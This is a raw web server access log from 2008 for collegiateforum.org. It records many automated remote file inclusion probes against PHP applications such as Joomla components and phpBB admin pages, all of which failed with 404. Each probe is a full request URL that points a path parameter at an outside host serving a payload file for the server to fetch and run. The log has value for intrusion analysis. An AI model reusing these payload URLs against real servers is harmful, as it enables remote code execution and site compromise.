74.208.46.46 - - [22/Jun/2008:20:19:27 -0700] "GET //orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:19:27 -0700] "GET /logs//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:20:17 -0700] "GET /logs/access_080324.log/home.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:20:17 -0700] "GET /logs/access_080324.log/home.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:20:17 -0700] "GET /home.php?pagina=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:20:17 -0700] "GET /home.php?pagina=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:20:22:25 -0700] "GET /logs/access_071224.log/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:26 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:26 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:26 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:33 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:33 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:34 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:45 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:45 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:22:45 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.99.193.134 - - [22/Jun/2008:20:22:47 -0700] "GET /logs/access.log/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
216.99.193.134 - - [22/Jun/2008:20:22:47 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
216.99.193.134 - - [22/Jun/2008:20:22:47 -0700] "GET /logs/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
216.20.10.20 - - [22/Jun/2008:20:23:00 -0700] "GET /logs/access.log/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.20.10.20 - - [22/Jun/2008:20:23:00 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.20.10.20 - - [22/Jun/2008:20:23:00 -0700] "GET /logs/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:23:06 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:23:06 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:23:07 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:20:24:11 -0700] "GET /logs/access_071224.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:20:24:11 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:20:24:11 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.112.193.46 - - [22/Jun/2008:20:24:15 -0700] "GET /logs/access.log/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.112.193.46 - - [22/Jun/2008:20:24:15 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.112.193.46 - - [22/Jun/2008:20:24:16 -0700] "GET /logs/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.6.18.246 - - [22/Jun/2008:20:25:05 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
67.195.58.167 - - [22/Jun/2008:20:25:06 -0700] "GET /logs/access_080324.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:20:26:22 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.53.51.240 - - [22/Jun/2008:20:26:47 -0700] "GET /logs/access_080609.log/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
206.53.51.240 - - [22/Jun/2008:20:26:47 -0700] "GET /include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
206.53.51.240 - - [22/Jun/2008:20:26:47 -0700] "GET /logs/include/lib.inc.php?site_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:01 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:01 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:17 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
209.250.234.226 - - [22/Jun/2008:20:27:20 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
209.250.234.226 - - [22/Jun/2008:20:27:20 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
209.250.234.226 - - [22/Jun/2008:20:27:20 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:27:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
209.250.234.226 - - [22/Jun/2008:20:27:37 -0700] "GET /logs/access_080609.log//admin/business_inc/saveserver.php?thisdir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:20:28:11 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:20:28:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:20:28:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
200.203.245.7 - - [22/Jun/2008:20:29:25 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.203.245.7 - - [22/Jun/2008:20:29:25 -0700] "GET /logs/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:28 -0700] "GET /logs/access.log/loc.php?lang=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:33 -0700] "GET /logs/access.log/loc.php?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:38 -0700] "GET /loc.php?lang=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:39 -0700] "GET /loc.php?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:44 -0700] "GET /logs/loc.php?lang=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:29:49 -0700] "GET /logs/loc.php?lang=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.62.24.242 - - [22/Jun/2008:20:29:53 -0700] "GET /errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.20.10.20 - - [22/Jun/2008:20:31:24 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
88.131.106.16 - - [22/Jun/2008:20:31:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.collegiateforum.org"
88.131.106.16 - - [22/Jun/2008:20:31:35 -0700] "GET /copyright.php HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:32:07 -0700] "GET /logs/adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:32:07 -0700] "GET /adminbereich/designconfig.php?config[fsBase]=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
216.99.193.134 - - [22/Jun/2008:20:32:15 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:32:21 -0700] "GET //geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:32:21 -0700] "GET /logs//geoip/DNS/RR.php?phpdns_basedir=:http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:33:00 -0700] "GET /logs/access_080303.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:33:01 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.112.193.46 - - [22/Jun/2008:20:33:12 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:20:33:53 -0700] "GET /include/monitoring/engine/MakeXML.php?fileOreonConf=:http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
67.19.74.194 - - [22/Jun/2008:20:33:53 -0700] "GET /logs/include/monitoring/engine/MakeXML.php?fileOreonConf=:http://www.wir-sind-pankow.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
216.118.97.213 - - [22/Jun/2008:20:34:09 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.118.97.213 - - [22/Jun/2008:20:34:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.118.97.213 - - [22/Jun/2008:20:34:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:34:10 -0700] "GET /logs//include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:34:10 -0700] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=:http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:34:23 -0700] "GET /logs/[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
72.47.204.44 - - [22/Jun/2008:20:34:23 -0700] "GET /[Scripthttp://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
216.118.97.213 - - [22/Jun/2008:20:34:27 -0700] "GET /logs/access_080609.log//admin/business_inc/saveserver.php?thisdir=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:35:28 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:35:53 -0700] "GET /logs/access_071224.log//admin/admin_styles.php?phpbb_root_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:35:53 -0700] "GET //admin/admin_styles.php?phpbb_root_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:35:53 -0700] "GET /logs//admin/admin_styles.php?phpbb_root_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.220.27.81 - - [22/Jun/2008:20:36:05 -0700] "GET /logs/access_071224.log//admin/admin_styles.php?phpbb_root_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.220.27.81 - - [22/Jun/2008:20:36:05 -0700] "GET //admin/admin_styles.php?phpbb_root_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
66.220.27.81 - - [22/Jun/2008:20:36:05 -0700] "GET /logs//admin/admin_styles.php?phpbb_root_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:37:28 -0700] "GET /logs/access_071224.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:37:28 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:37:29 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.220.27.81 - - [22/Jun/2008:20:38:35 -0700] "GET //admin/admin_styles.php?phpbb_root_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
119.63.194.114 - - [22/Jun/2008:20:39:13 -0700] "GET / HTTP/1.1" 200 934 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:20:39:49 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=:ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:40:09 -0700] "GET /logs/access_071231.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/indobokep/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:40:19 -0700] "GET //admin/admin_styles.php?phpbb_root_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
201.17.3.26 - - [22/Jun/2008:20:41:22 -0700] "GET /logs/access.log/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
201.17.3.26 - - [22/Jun/2008:20:41:23 -0700] "GET /index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
201.17.3.26 - - [22/Jun/2008:20:41:24 -0700] "GET /logs/index.php?pagina=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:41:55 -0700] "GET /logs/access_071224.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:41:56 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:41:56 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:20:42:55 -0700] "GET /logs//errors.php?error=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:20:42:56 -0700] "GET //errors.php?error=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:45:06 -0700] "GET /logs/access_071203.log//admin/admin_styles.php?phpbb_root_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
66.220.27.81 - - [22/Jun/2008:20:46:15 -0700] "GET /logs/access_071203.log//admin/admin_styles.php?phpbb_root_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:48:31 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:20:49:21 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:49:34 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:49:34 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:49:40 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:49:45 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:53:27 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:53:27 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:53:27 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
67.52.100.181 - - [22/Jun/2008:20:53:52 -0700] "GET /logs/access_080609.log//admin/business_inc/saveserver.php?thisdir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:20:56:22 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
